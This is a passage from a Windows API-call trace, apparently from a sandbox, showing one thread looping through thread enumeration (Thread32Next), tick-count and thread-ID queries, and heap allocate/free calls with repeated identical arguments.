dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.503] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.504] GetTickCount () returned 0x1139a6c [0230.504] GetCurrentThreadId () returned 0x314 [0230.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.504] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.505] GetTickCount () returned 0x1139a6c [0230.505] GetCurrentThreadId () returned 0x314 [0230.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.505] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.507] GetTickCount () returned 0x1139a6c [0230.507] GetCurrentThreadId () returned 0x314 [0230.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.507] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.508] GetTickCount () returned 0x1139a6c [0230.508] GetCurrentThreadId () returned 0x314 [0230.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.508] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.509] GetTickCount () returned 0x1139a7b [0230.509] GetCurrentThreadId () returned 0x314 [0230.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.510] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.510] GetTickCount () returned 0x1139a7b [0230.511] GetCurrentThreadId () returned 0x314 [0230.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.511] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.512] GetTickCount () returned 0x1139a7b [0230.512] GetCurrentThreadId () returned 0x314 [0230.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.512] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.513] GetTickCount () returned 0x1139a7b [0230.513] GetCurrentThreadId () returned 0x314 [0230.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.513] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.514] GetTickCount () returned 0x1139a7b [0230.514] GetCurrentThreadId () returned 0x314 [0230.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.514] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.516] GetTickCount () returned 0x1139a7b [0230.516] GetCurrentThreadId () returned 0x314 [0230.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.516] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.517] GetTickCount () returned 0x1139a7b [0230.517] GetCurrentThreadId () returned 0x314 [0230.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.517] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.518] GetTickCount () returned 0x1139a7b [0230.518] GetCurrentThreadId () returned 0x314 [0230.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.518] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.519] GetTickCount () returned 0x1139a7b [0230.520] GetCurrentThreadId () returned 0x314 [0230.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.520] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.521] GetTickCount () returned 0x1139a7b [0230.521] GetCurrentThreadId () returned 0x314 [0230.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.521] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.522] GetTickCount () returned 0x1139a7b [0230.522] GetCurrentThreadId () returned 0x314 [0230.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.522] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.523] GetTickCount () returned 0x1139a7b [0230.523] GetCurrentThreadId () returned 0x314 [0230.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.523] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.525] GetTickCount () returned 0x1139a8b [0230.525] GetCurrentThreadId () returned 0x314 [0230.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.525] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.526] GetTickCount () returned 0x1139a8b [0230.526] GetCurrentThreadId () returned 0x314 [0230.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.526] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.527] GetTickCount () returned 0x1139a8b [0230.527] GetCurrentThreadId () returned 0x314 [0230.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.527] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.528] GetTickCount () returned 0x1139a8b [0230.528] GetCurrentThreadId () returned 0x314 [0230.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.529] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.530] GetTickCount () returned 0x1139a8b [0230.530] GetCurrentThreadId () returned 0x314 [0230.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.530] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.531] GetTickCount () returned 0x1139a8b [0230.531] GetCurrentThreadId () returned 0x314 [0230.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.531] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.532] GetTickCount () returned 0x1139a8b [0230.532] GetCurrentThreadId () returned 0x314 [0230.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.532] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.534] GetTickCount () returned 0x1139a8b [0230.534] GetCurrentThreadId () returned 0x314 [0230.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.534] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.535] GetTickCount () returned 0x1139a8b [0230.535] GetCurrentThreadId () returned 0x314 [0230.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.535] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.536] GetTickCount () returned 0x1139a8b [0230.536] GetCurrentThreadId () returned 0x314 [0230.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.536] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.537] GetTickCount () returned 0x1139a8b [0230.538] GetCurrentThreadId () returned 0x314 [0230.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.538] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.539] GetTickCount () returned 0x1139a8b [0230.539] GetCurrentThreadId () returned 0x314 [0230.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.539] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.540] GetTickCount () returned 0x1139a9b [0230.540] GetCurrentThreadId () returned 0x314 [0230.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.540] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.541] GetTickCount () returned 0x1139a9b [0230.541] GetCurrentThreadId () returned 0x314 [0230.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.542] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.543] GetTickCount () returned 0x1139a9b [0230.543] GetCurrentThreadId () returned 0x314 [0230.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.543] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.544] GetTickCount () returned 0x1139a9b [0230.544] GetCurrentThreadId () returned 0x314 [0230.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.544] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.545] GetTickCount () returned 0x1139a9b [0230.545] GetCurrentThreadId () returned 0x314 [0230.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.545] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.547] GetTickCount () returned 0x1139a9b [0230.547] GetCurrentThreadId () returned 0x314 [0230.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.547] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.548] GetTickCount () returned 0x1139a9b [0230.548] GetCurrentThreadId () returned 0x314 [0230.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.548] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.549] GetTickCount () returned 0x1139a9b [0230.549] GetCurrentThreadId () returned 0x314 [0230.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.549] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.550] GetTickCount () returned 0x1139a9b [0230.550] GetCurrentThreadId () returned 0x314 [0230.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.551] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.552] GetTickCount () returned 0x1139a9b [0230.552] GetCurrentThreadId () returned 0x314 [0230.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.552] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.553] GetTickCount () returned 0x1139a9b [0230.553] GetCurrentThreadId () returned 0x314 [0230.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.553] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.554] GetTickCount () returned 0x1139a9b [0230.554] GetCurrentThreadId () returned 0x314 [0230.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.554] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.556] GetTickCount () returned 0x1139aaa [0230.556] GetCurrentThreadId () returned 0x314 [0230.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.556] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.557] GetTickCount () returned 0x1139aaa [0230.557] GetCurrentThreadId () returned 0x314 [0230.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.557] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.558] GetTickCount () returned 0x1139aaa [0230.558] GetCurrentThreadId () returned 0x314 [0230.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.558] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.559] GetTickCount () returned 0x1139aaa [0230.559] GetCurrentThreadId () returned 0x314 [0230.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.559] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.561] GetTickCount () returned 0x1139aaa [0230.561] GetCurrentThreadId () returned 0x314 [0230.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.561] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.562] GetTickCount () returned 0x1139aaa [0230.562] GetCurrentThreadId () returned 0x314 [0230.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.562] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.563] GetTickCount () returned 0x1139aaa [0230.563] GetCurrentThreadId () returned 0x314 [0230.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.563] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.564] GetTickCount () returned 0x1139aaa [0230.564] GetCurrentThreadId () returned 0x314 [0230.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.564] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.565] GetTickCount () returned 0x1139aaa [0230.565] GetCurrentThreadId () returned 0x314 [0230.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.566] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.567] GetTickCount () returned 0x1139aaa [0230.567] GetCurrentThreadId () returned 0x314 [0230.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.567] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.568] GetTickCount () returned 0x1139aaa [0230.568] GetCurrentThreadId () returned 0x314 [0230.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.568] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.569] GetTickCount () returned 0x1139aaa [0230.569] GetCurrentThreadId () returned 0x314 [0230.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.569] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.570] GetTickCount () returned 0x1139aaa [0230.570] GetCurrentThreadId () returned 0x314 [0230.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.570] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.572] GetTickCount () returned 0x1139aba [0230.572] GetCurrentThreadId () returned 0x314 [0230.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.572] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.573] GetTickCount () returned 0x1139aba [0230.573] GetCurrentThreadId () returned 0x314 [0230.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.574] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.575] GetTickCount () returned 0x1139aba [0230.575] GetCurrentThreadId () returned 0x314 [0230.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.575] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.576] GetTickCount () returned 0x1139aba [0230.576] GetCurrentThreadId () returned 0x314 [0230.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.576] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.577] GetTickCount () returned 0x1139aba [0230.577] GetCurrentThreadId () returned 0x314 [0230.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.577] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.578] GetTickCount () returned 0x1139aba [0230.578] GetCurrentThreadId () returned 0x314 [0230.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.579] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.580] GetTickCount () returned 0x1139aba [0230.580] GetCurrentThreadId () returned 0x314 [0230.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.580] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.581] GetTickCount () returned 0x1139aba [0230.581] GetCurrentThreadId () returned 0x314 [0230.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.581] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.582] GetTickCount () returned 0x1139aba [0230.582] GetCurrentThreadId () returned 0x314 [0230.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.582] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.583] GetTickCount () returned 0x1139aba [0230.583] GetCurrentThreadId () returned 0x314 [0230.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.583] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.585] GetTickCount () returned 0x1139aba [0230.585] GetCurrentThreadId () returned 0x314 [0230.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.585] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.586] GetTickCount () returned 0x1139aba [0230.586] GetCurrentThreadId () returned 0x314 [0230.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.586] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.587] GetTickCount () returned 0x1139ac9 [0230.587] GetCurrentThreadId () returned 0x314 [0230.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.587] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.588] GetTickCount () returned 0x1139ac9 [0230.588] GetCurrentThreadId () returned 0x314 [0230.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.588] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.590] GetTickCount () returned 0x1139ac9 [0230.590] GetCurrentThreadId () returned 0x314 [0230.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.590] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.590] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.591] GetTickCount () returned 0x1139ac9 [0230.591] GetCurrentThreadId () returned 0x314 [0230.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.591] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.592] GetTickCount () returned 0x1139ac9 [0230.592] GetCurrentThreadId () returned 0x314 [0230.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.592] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.593] GetTickCount () returned 0x1139ac9 [0230.593] GetCurrentThreadId () returned 0x314 [0230.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.593] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.594] GetTickCount () returned 0x1139ac9 [0230.594] GetCurrentThreadId () returned 0x314 [0230.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.595] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.596] GetTickCount () returned 0x1139ac9 [0230.596] GetCurrentThreadId () returned 0x314 [0230.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 